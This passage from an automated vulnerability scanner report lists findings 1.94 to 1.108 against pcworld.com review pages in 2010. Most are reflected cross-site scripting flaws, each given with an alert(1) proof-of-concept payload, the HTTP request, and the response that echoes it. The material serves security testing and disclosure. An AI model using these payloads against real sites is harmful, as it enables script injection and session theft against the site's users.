
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f9c0'-alert(1)-'a1547080d17 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1602/top_10_digital_slr_cameras.html7f9c0'-alert(1)-'a1547080d17 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=545FAD25320AB3369AA7EA6514631C5A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:03 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1602/top_10_digital_slr_cameras.html7f9c0'-alert(1)-'a1547080d17';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.94. http://www.pcworld.com/reviews/collection/1603/top_10_point_and_shoot_cameras.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1603/top_10_point_and_shoot_cameras.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6963a'-alert(1)-'e6565f9c2c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1603/top_10_point_and_shoot_cameras.html6963a'-alert(1)-'e6565f9c2c0 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3E0947D07A0FB3D1931606E389570FB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:56 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Email');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1603/top_10_point_and_shoot_cameras.html6963a'-alert(1)-'e6565f9c2c0';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.95. http://www.pcworld.com/reviews/collection/1645/top_10_power_desktop_pcs.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1645/top_10_power_desktop_pcs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9ab0'-alert(1)-'9a22c791136 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1645/top_10_power_desktop_pcs.htmle9ab0'-alert(1)-'9a22c791136 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2B1ABF43223BFA00F4C685D97A44DAFB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:32 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1645/top_10_power_desktop_pcs.htmle9ab0'-alert(1)-'9a22c791136';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.96. http://www.pcworld.com/reviews/collection/1646/top_10_value_desktop_pcs.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1646/top_10_value_desktop_pcs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5707'-alert(1)-'58fcd28a68e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1646/top_10_value_desktop_pcs.htmle5707'-alert(1)-'58fcd28a68e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:52 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1646/top_10_value_desktop_pcs.htmle5707'-alert(1)-'58fcd28a68e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.97. http://www.pcworld.com/reviews/collection/1647/Best_Budget_All_in_One_PCs_20_Inches_Or_Smaller.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1647/Best_Budget_All_in_One_PCs_20_Inches_Or_Smaller.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d089'-alert(1)-'8cd45779378 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1647/Best_Budget_All_in_One_PCs_20_Inches_Or_Smaller.html8d089'-alert(1)-'8cd45779378 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5FE251E163A0FAF407CE859E554445CD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:17 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1647/Best_Budget_All_in_One_PCs_20_Inches_Or_Smaller.html8d089'-alert(1)-'8cd45779378';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.98. http://www.pcworld.com/reviews/collection/1648/top_5_all_in_one_pcs_20_inches_or_larger.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1648/top_5_all_in_one_pcs_20_inches_or_larger.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd296'-alert(1)-'1d9c3784495 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1648/top_5_all_in_one_pcs_20_inches_or_larger.htmlcd296'-alert(1)-'1d9c3784495 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:49 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1648/top_5_all_in_one_pcs_20_inches_or_larger.htmlcd296'-alert(1)-'1d9c3784495';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.99. http://www.pcworld.com/reviews/collection/1649/top_5_gps_devices.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1649/top_5_gps_devices.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bab18'-alert(1)-'48b4d1f4030 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1649/top_5_gps_devices.htmlbab18'-alert(1)-'48b4d1f4030 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=445D8ACD7E522CF6D17B00852EA21E7B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
dCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1649/top_5_gps_devices.htmlbab18'-alert(1)-'48b4d1f4030';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.100. http://www.pcworld.com/reviews/collection/1650/top_10_external_hard_drives.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1650/top_10_external_hard_drives.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd84f'-alert(1)-'3ad93113d2d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1650/top_10_external_hard_drives.htmlfd84f'-alert(1)-'3ad93113d2d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C19F66C9EF2204D488C29D334D647575; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:25 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
serEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1650/top_10_external_hard_drives.htmlfd84f'-alert(1)-'3ad93113d2d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.101. http://www.pcworld.com/reviews/collection/1651/top_10_network_attached_storage_devices.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1651/top_10_network_attached_storage_devices.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e54d'-alert(1)-'74df4de751c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1651/top_10_network_attached_storage_devices.html6e54d'-alert(1)-'74df4de751c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:31 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1651/top_10_network_attached_storage_devices.html6e54d'-alert(1)-'74df4de751c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.102. http://www.pcworld.com/reviews/collection/1651/top_10_network_attached_storage_devices.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /reviews/collection/1651/top_10_network_attached_storage_devices.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51886"><a>eb8fa4341a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reviews/collection/1651/top_10_network_attached_storage_devices.html51886"><a>eb8fa4341a7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=046FC7F90CB57F59181865276A5D8CD7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:23 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
reviews/products/storage/hard_drives/chart;pg=chart;c=2111;c=2111;c=2112;c=2000;c=2100;pos=336showcase;tile=2;sz=336x280;
&amp;url=/reviews/collection/1651/top_10_network_attached_storage_devices.html51886"><a>eb8fa4341a7"/>
...[SNIP]...

1.103. http://www.pcworld.com/reviews/collection/1652/top_5_internal_hard_drives.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1652/top_5_internal_hard_drives.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d47d'-alert(1)-'9e688f26a03 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1652/top_5_internal_hard_drives.html2d47d'-alert(1)-'9e688f26a03 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0EC602CDA7385FD361E4600F7A3C8AF7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:59 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1652/top_5_internal_hard_drives.html2d47d'-alert(1)-'9e688f26a03';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.104. http://www.pcworld.com/reviews/collection/1653/top_42_inch_hdtvs.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1653/top_42_inch_hdtvs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecbe0'-alert(1)-'7f834a4b0f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1653/top_42_inch_hdtvs.htmlecbe0'-alert(1)-'7f834a4b0f2 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7556E427D340FC45B604D5800EB662A9; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:15 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
dCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1653/top_42_inch_hdtvs.htmlecbe0'-alert(1)-'7f834a4b0f2';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.105. http://www.pcworld.com/reviews/collection/1654/top_5_46_and_47inch_hdtvs.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1654/top_5_46_and_47inch_hdtvs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e127a'-alert(1)-'eecea77240f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1654/top_5_46_and_47inch_hdtvs.htmle127a'-alert(1)-'eecea77240f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:59:52 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
'userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1654/top_5_46_and_47inch_hdtvs.htmle127a'-alert(1)-'eecea77240f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.106. http://www.pcworld.com/reviews/collection/1655/top_big_hdtvs.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1655/top_big_hdtvs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 319c0'-alert(1)-'270596086d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1655/top_big_hdtvs.html319c0'-alert(1)-'270596086d7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=52452A436E3F21EF8B1C2E57C580111F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:25 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1655/top_big_hdtvs.html319c0'-alert(1)-'270596086d7';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.107. http://www.pcworld.com/reviews/collection/1656/top_bluray_disc_players.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1656/top_bluray_disc_players.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 797e1'-alert(1)-'9c0f310588 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1656/top_bluray_disc_players.html797e1'-alert(1)-'9c0f310588 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:50 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1656/top_bluray_disc_players.html797e1'-alert(1)-'9c0f310588';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.108. http://www.pcworld.com/reviews/collection/1657/top_10_allpurpose_laptops.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1657/top_10_allpurpose_laptops.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51789'-alert(1)-'9884d94cdac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1657/top_10_allpurpose_laptops.html51789'-alert(1)-'9884d94cdac HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=10E4087C05404C7142DDFF8F8FB4735F; Path=/
